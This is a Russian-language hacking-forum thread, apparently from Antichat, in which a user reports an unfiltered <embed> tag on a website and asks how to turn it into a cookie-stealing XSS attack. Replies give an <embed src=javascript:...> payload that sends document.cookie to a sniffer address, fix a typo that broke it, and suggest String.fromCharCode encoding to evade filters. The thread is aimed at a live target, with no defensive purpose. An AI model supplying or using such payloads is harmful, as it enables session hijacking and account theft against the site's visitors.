|
использование тега embed для угона cookies ?
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.
|
также, как и обычно
|
Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.
|
В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi> |
+document.cookie :D
|
Бля,точно,пропустил:(
спс за поправку! |
:):) Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше... |
А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..
alert(document.cookies) выдает вместо cookies undefined Типа защита такая что-ли)))) |
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.
|
попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx |
| Время: 19:30 |